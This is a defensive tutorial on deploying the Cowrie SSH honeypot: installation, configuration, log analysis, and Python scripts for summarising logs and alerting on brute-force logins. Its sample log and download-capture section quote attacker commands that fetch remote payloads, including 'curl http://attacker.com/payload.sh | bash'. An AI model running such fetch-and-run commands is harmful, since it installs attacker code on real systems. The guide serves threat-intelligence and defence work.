Introduction
Cowrie is a medium-interaction SSH honeypot that simulates a vulnerable SSH server, capturing attacker commands, credentials, and malware samples. By deploying Cowrie, security researchers can observe real-world attack patterns, collect threat intelligence, and understand how attackers behave once they gain access to a compromised system. This guide walks you through installation, configuration, and analysis of captured attack data.
What Is Cowrie?
Cowrie is an open-source honeypot that emulates an SSH server without providing real system access. When attackers attempt to compromise the honeypot, Cowrie logs all activity:
- Login attempts and credentials
- Commands executed
- Files downloaded
- Reverse shell attempts
- Privilege escalation techniques
Architecture: How Honeypots Work
Honeypot Layers
Internet ← [Attacker IP] → Cowrie SSH Honeypot (Port 22/Custom)
                                        ↓
                                  Log Activity
                                  Capture Malware
                                  Track Patterns
Cowrie appears to be a real system but:
- Provides no real shell
- Contains no sensitive data
- Cannot affect your real infrastructure
- Logs everything attackers attempt
System Requirements
- Linux server (Ubuntu 20.04+ or Debian 11+)
- Python 3.7+
- 2GB RAM minimum (4GB+ recommended)
- Public IP address (for attracting real attackers)
- Dedicated user account (honeypot isolation)
Installation on Ubuntu/Debian
Step 1: Install Dependencies
sudo apt update
sudo apt install git python3 python3-pip python3-dev libffi-dev libssl-dev
Step 2: Create Honeypot User
sudo useradd -m -s /bin/bash cowrie
sudo su - cowrie
Step 3: Clone Cowrie Repository
git clone https://github.com/cowrie/cowrie.git
cd cowrie
Step 4: Install Python Dependencies
pip3 install --upgrade pip
pip3 install -r requirements.txt
cp etc/cowrie.conf.dist etc/cowrie.conf
Configuration
Edit cowrie.conf
Open the configuration file:
nano etc/cowrie.conf
Essential Settings
Listening Configuration:
[ssh]
listen_endpoints = tcp:2222:interface=0.0.0.0
ssh_type = paramiko
This makes Cowrie listen on port 2222. You can use port 22 if running as root (not recommended).
Hostname and System Information:
[honeypot]
hostname = debian
kernel_version = 4.19.0-5-generic
Set a realistic hostname and kernel to appear legitimate.
Backend Storage:
[database]
backend = file
Stores logs in text files. For large deployments, configure PostgreSQL.
Logging Verbosity:
[honeypot]
log_commands = true
log_timestamps = true
Ensures detailed command logging.
Starting Cowrie
Manual Start
bin/cowrie start
Verify It’s Running
netstat -tlnp | grep 2222
# OR
ss -tlnp | grep 2222
Check Logs
tail -f var/log/cowrie/cowrie.log
Test Connection (from another machine)
ssh -p 2222 root@honeypot.example.com
# Password: root (anything works)
Understanding Cowrie Logs
Honeypot Event Logs
cat var/log/cowrie/honeypot.log
Shows connections and commands:
2026-04-12 14:32:15 New connection from 203.0.113.45 (SSH-2.0-OpenSSH_7.4)
2026-04-12 14:32:20 Login attempt [root/12345]
2026-04-12 14:32:25 Command: whoami
2026-04-12 14:32:26 Command: id
2026-04-12 14:32:28 Command: wget http://malware.com/bot.sh
JSON Structured Logs
For analysis in tools like Splunk or Elasticsearch:
cat var/log/cowrie/cowrie.json
Each event as structured JSON for easy parsing.
Capturing Malware and Downloads
Enable Download Capture
By default, Cowrie simulates downloads without actually retrieving files. To capture real malware:
mkdir downloads
chmod 777 downloads
Edit cowrie.conf:
[honeypot]
download_path = /home/cowrie/downloads
Downloaded Files
When attackers execute commands like:
wget http://malware.example.com/bot
curl http://attacker.com/payload.sh | bash
Cowrie logs the URLs and can capture the files if configured.
Malware Analysis Workflow
- Monitor downloads: Check the downloads/ directory regularly
- Scan with antivirus:
clamscan downloads/*
- Upload to VirusTotal: Analyze without exposing your honeypot
- Extract indicators: IP addresses, domains, hashes
- Share intelligence: Report to abuse teams
Advanced Configuration: Port Forwarding
Expose Port 22 Safely
To attract more attackers, expose the SSH service on standard port 22:
Option 1: Run as root (not recommended):
[ssh]
listen_endpoints = tcp:22:interface=0.0.0.0
Option 2: Use iptables forwarding (better):
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
sudo sh -c 'iptables-save > /etc/iptables/rules.v4'   # the redirect must also run as root, so wrap it in sh -c
Simulating System Responses
Fake /etc/passwd
Cowrie includes simulation files:
ls -l share/cowrie/fs.pickle   # binary pickle describing the fake filesystem tree; not human-readable
Customize the fake file system:
[honeypot]
filesystem = share/cowrie/fs.pickle
Fake Commands
Create responses to common reconnaissance commands:
# Simulate MySQL service
service mysql status
# Returns: "mysql is running"
# Simulate network info
ifconfig
# Returns: Fake IP configuration
Systemd Service for Persistence
Create Service File
sudo nano /etc/systemd/system/cowrie.service
[Unit]
Description=Cowrie SSH Honeypot
After=network.target
[Service]
Type=forking
User=cowrie
WorkingDirectory=/home/cowrie/cowrie
ExecStart=/home/cowrie/cowrie/bin/cowrie start
ExecStop=/home/cowrie/cowrie/bin/cowrie stop
[Install]
WantedBy=multi-user.target
Enable and Start
sudo systemctl daemon-reload
sudo systemctl enable cowrie
sudo systemctl start cowrie
Check Status
sudo systemctl status cowrie
Analyzing Attack Data
Connections per Attacker IP
grep "New connection" var/log/cowrie/cowrie.log | awk '{print $(NF-1)}' | sort | uniq -c | sort -rn
Common Commands Executed
grep "Command:" var/log/cowrie/cowrie.log | awk -F'Command: ' '{print $2}' | sort | uniq -c | sort -rn
Failed Login Attempts
grep "Login attempt" var/log/cowrie/cowrie.log | wc -l
Most Targeted Usernames
grep "Login attempt" var/log/cowrie/cowrie.log | awk -F'[\\[\\]]' '{print $2}' | cut -d/ -f1 | sort | uniq -c | sort -rn
Honey Files and Traps
Create Fake SSH Keys
To entice attackers to steal credentials:
mkdir -p var/lib/cowrie/.ssh
echo "fake-key-content" > var/lib/cowrie/.ssh/id_rsa
chmod 600 var/lib/cowrie/.ssh/id_rsa
Fake Credentials in Files
Cowrie can simulate discoverable credentials:
# Create fake database config
echo "mysql_user=root" > /fake/database.conf
echo "mysql_password=SecurePassword123" >> /fake/database.conf
Threat Intelligence Sharing
Compile attack indicators for sharing:
# Attacker IPs
grep "New connection" var/log/cowrie/cowrie.log | awk '{print $(NF-1)}' > attackers.txt
# Accessed URLs
grep "wget\|curl" var/log/cowrie/cowrie.log | awk -F'http' '{print "http"$2}' > urls.txt
# Malware hashes
sha256sum downloads/* > malware_hashes.txt
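The same aggregation as the grep/awk one-liners in the Analyzing Attack Data and Threat Intelligence Sharing sections above, run over the structured cowrie.json log instead of the text log. This is an added example, not code from the original guide or from the Cowrie project; the sample events are constructed (Cowrie's real field names eventid, src_ip, username, input, url and shasum are used) and the script name cowrie_summary.py is assumed.

```python
import json
import sys
from collections import Counter

# Constructed sample of cowrie.json lines (not captured from a real honeypot).
# The last line is deliberately truncated to show that corrupt lines are skipped.
SAMPLE_JSON = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.45","src_port":51234,"dst_port":2222,"session":"s1","timestamp":"2026-04-12T14:32:15.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.45","username":"root","password":"12345","session":"s1","timestamp":"2026-04-12T14:32:20.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.45","input":"whoami","session":"s1","timestamp":"2026-04-12T14:32:25.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.45","input":"wget http://malware.example.com/bot","session":"s1","timestamp":"2026-04-12T14:32:28.000000Z"}
{"eventid":"cowrie.session.file_download","src_ip":"203.0.113.45","url":"http://malware.example.com/bot","shasum":"constructed-sha256-placeholder","session":"s1","timestamp":"2026-04-12T14:32:30.000000Z"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","src_port":40001,"dst_port":2222,"session":"s2","timestamp":"2026-04-12T15:01:00.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","username":"admin","password":"admin","session":"s2","timestamp":"2026-04-12T15:01:02.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","username":"root","password":"toor","session":"s2","timestamp":"2026-04-12T15:01:04.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.45","username":"root","pass
"""


def parse_events(text):
    """Yield one dict per well-formed JSON line; skip blank or truncated lines."""
    for line in text.splitlines():
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue  # blank lines and partial writes at the tail of a live log


def summarize(events):
    """Aggregate the indicators the grep/awk one-liners extract from the text log."""
    ips, users, cmds, urls, hashes = Counter(), Counter(), Counter(), set(), set()
    for ev in events:
        eid = ev.get("eventid", "")
        if eid == "cowrie.session.connect":
            ips[ev.get("src_ip", "?")] += 1
        elif eid in ("cowrie.login.failed", "cowrie.login.success"):
            users[ev.get("username", "")] += 1
        elif eid == "cowrie.command.input":
            cmds[ev.get("input", "")] += 1
        elif eid == "cowrie.session.file_download":
            urls.add(ev.get("url", ""))
            hashes.add(ev.get("shasum", ""))
    return {"ips": ips, "usernames": users, "commands": cmds,
            "urls": sorted(u for u in urls if u), "hashes": sorted(h for h in hashes if h)}


if __name__ == "__main__":  # usage: python3 cowrie_summary.py [path/to/cowrie.json]
    s = summarize(parse_events(open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_JSON))
    for key in ("ips", "usernames", "commands"):
        print(key, s[key].most_common(5))
    print("urls", s["urls"], "hashes", s["hashes"])
```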
Report to Abuse Teams
- ABUSE.NET for hosting providers
- National CERT teams
- AbuseIPDB for IP reputation
- VirusTotal for malware analysis
Monitoring and Alerting
Alert on Suspicious Activity
For intrusion detection in real-time:
# Watch failed logins from a single IP in real time (the IP below is an example)
tail -f var/log/cowrie/cowrie.log | grep "Login attempt" | grep "203.0.113.45"
Continuous Monitoring Setup
# Cron job to check for activity
*/30 * * * * grep "Login attempt" /home/cowrie/cowrie/var/log/cowrie/cowrie.log | tail -100 >> /var/log/cowrie_alerts.log
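The grep pipeline above only filters one known IP; a sliding-window counter over cowrie.json events is what actually raises an alert when one source exceeds a failed-login threshold. Added example, not code from the original guide or from Cowrie; the threshold, window size, script name brute_alert.py and the sample events are all constructed assumptions.

```python
import json
import sys
from collections import defaultdict, deque
from datetime import datetime

THRESHOLD = 5        # failed logins from one source IP ...
WINDOW_SECONDS = 60  # ... within this many seconds raise one alert


class BruteForceDetector:
    def __init__(self, threshold=THRESHOLD, window=WINDOW_SECONDS):
        self.threshold, self.window = threshold, window
        self.recent = defaultdict(deque)  # src_ip -> timestamps of recent failures
        self.alerted = set()              # alert once per IP, not once per line

    def feed(self, line):
        """Consume one cowrie.json line; return an alert string or None."""
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            return None  # blank or partially written line
        if ev.get("eventid") != "cowrie.login.failed":
            return None
        # Cowrie timestamps look like 2026-04-12T14:32:15.123456Z; seconds suffice here.
        now = datetime.strptime(ev["timestamp"][:19], "%Y-%m-%dT%H:%M:%S")
        q = self.recent[ev["src_ip"]]
        q.append(now)
        while (now - q[0]).total_seconds() > self.window:  # expire failures outside the window
            q.popleft()
        if len(q) >= self.threshold and ev["src_ip"] not in self.alerted:
            self.alerted.add(ev["src_ip"])
            return f"ALERT {now.isoformat()} {ev['src_ip']}: {len(q)} failed logins in {self.window}s"
        return None


def _event(ip, second):
    """Constructed cowrie.login.failed line (not real honeypot data)."""
    return json.dumps({"eventid": "cowrie.login.failed", "src_ip": ip, "username": "root",
                       "password": "x", "timestamp": f"2026-04-12T14:32:{second:02d}.000000Z"})

# Constructed input: one IP fails every 5 s (a burst); another fails only three times.
SAMPLE_LINES = ([_event("203.0.113.45", s) for s in range(0, 30, 5)]
                + [_event("198.51.100.7", s) for s in (1, 31, 59)])


def run(lines, **kwargs):
    """Feed every line to a fresh detector and return the alerts it raised."""
    det = BruteForceDetector(**kwargs)
    return [a for a in map(det.feed, lines) if a]


if __name__ == "__main__":  # usage: tail -F var/log/cowrie/cowrie.json | python3 brute_alert.py
    for alert in run(sys.stdin if not sys.stdin.isatty() else SAMPLE_LINES):
        print(alert, flush=True)
```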
Security Considerations
Isolate the Honeypot
- Network segregation: Place on isolated subnet if possible
- Firewall rules: Block outbound connections from honeypot
- No real data: Never store actual credentials or files
- Monitoring: Watch for escape attempts
Prevent Real Breaches
While Cowrie is designed to be compromised:
- Run on dedicated VM or cloud instance
- Use separate credentials from real systems
- Monitor outbound traffic (attackers may try pivot)
- Keep Cowrie and dependencies patched
- Never connect to production network
Troubleshooting
Port Already in Use
sudo lsof -i :22
# Kill the process if needed
sudo kill -9 PID
Cowrie Won’t Start
Check logs:
cat var/log/cowrie/cowrie.log
Verify Python installation:
python3 --version
pip3 list | grep twisted
No SSH Connections
Ensure port is accessible:
sudo ufw allow 2222/tcp
sudo iptables -L -n | grep 2222
Conclusion
Cowrie provides invaluable threat intelligence by observing real attacker behavior. By deploying a honeypot, logging comprehensively, and analyzing patterns, you gain practical insights into attack techniques and tactics. Start with basic configuration in a lab environment, progress to port 22 exposure on a dedicated instance, and contribute your findings to the broader security community. This hands-on understanding of attacker behavior is invaluable for defensive security careers.